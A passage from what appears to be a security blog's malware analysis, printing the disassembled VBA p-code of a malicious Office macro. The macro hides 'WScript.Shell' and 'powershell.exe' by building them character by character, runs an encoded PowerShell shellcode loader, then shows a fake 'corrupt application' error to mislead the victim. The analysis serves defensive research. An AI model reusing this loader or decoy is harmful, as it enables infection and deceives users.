AHQAUAB0AHIAXQAoACQARQBjAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEIAQgApACwAIAAkAEcAdABbACQAQgBCAF0ALAAgADEA"
Concat
LitStr 0x0320 "KQB9ADsAJABUAEkAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEUAYwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAUQB2ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYATgApACkAOwAkAFEAdgBkACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHIASAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAByAEgAIAAkAFEAdgBkACAAJABRAHYAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwA"
Concat
LitStr 0x0027 "bAAgACQAUQB2AGQAIAAkAFEAdgAiADsAfQA=')""
Concat
St omVsI
Line #3:
Line #4:
Dim
VarDefn GhHqwBBoV
Line #5:
LitStr 0x0001 "S"
LitStr 0x0001 "h"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "l"
Concat
LitStr 0x0001 "l"
Concat
St GhHqwBBoV
Line #6:
Dim
VarDefn TWgKXCEMpLNvAkL
Line #7:
LitStr 0x0001 "W"
LitStr 0x0001 "S"
Concat
LitStr 0x0001 "c"
Concat
LitStr 0x0001 "r"
Concat
LitStr 0x0001 "i"
Concat
LitStr 0x0001 "p"
Concat
LitStr 0x0001 "t"
Concat
St TWgKXCEMpLNvAkL
Line #8:
Dim
VarDefn duWktH
Line #9:
Ld TWgKXCEMpLNvAkL
LitStr 0x0001 "."
Concat
Ld GhHqwBBoV
Concat
St duWktH
Line #10:
Dim
VarDefn zomnqaCVeYJhMzN
Line #11:
Dim
VarDefn ifZKwUg
Line #12:
SetStmt
Ld duWktH
Ld VBA
ArgsMemLd CreateObject 0x0001
Set zomnqaCVeYJhMzN
Line #13:
Dim
VarDefn hCiSSPdnGWigF
Line #14:
LitStr 0x0001 "p"
LitStr 0x0001 "o"
Concat
LitStr 0x0001 "w"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "r"
Concat
LitStr 0x0001 "s"
Concat
LitStr 0x0001 "h"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "l"
Concat
LitStr 0x0001 "l"
Concat
LitStr 0x0001 "."
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 "x"
Concat
LitStr 0x0001 "e"
Concat
LitStr 0x0001 " "
Concat
St hCiSSPdnGWigF
Line #15:
Ld hCiSSPdnGWigF
Ld omVsI
Concat
LitDI2 0x0000
LitVarSpecial (False)
Ld zomnqaCVeYJhMzN
ArgsMemLd Run 0x0003
St ifZKwUg
Line #16:
Dim
VarDefn title (As String)
Line #17:
LitStr 0x0039 "Microsoft Office Corrupt Application (Compatibility Mode)"
St title
Line #18:
Dim
VarDefn msg (As String)
Line #19:
Dim
VarDefn intResponse (As Integer)
Line #20:
LitStr 0x00AE "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
St msg
Line #21:
Ld msg
LitDI2 0x0010
Ld title
ArgsLd MsgBox 0x0003
St intResponse
Line #22:
Ld Application
ArgsMemCall Quit 0x0000
Line #23:
EndSub
Line
In the Article
X-Labs
Get insight, analysis & news straight to your inbox
To the Point
Cybersecurity
A Podcast covering latest trends and topics in the world of cybersecurity
Listen Now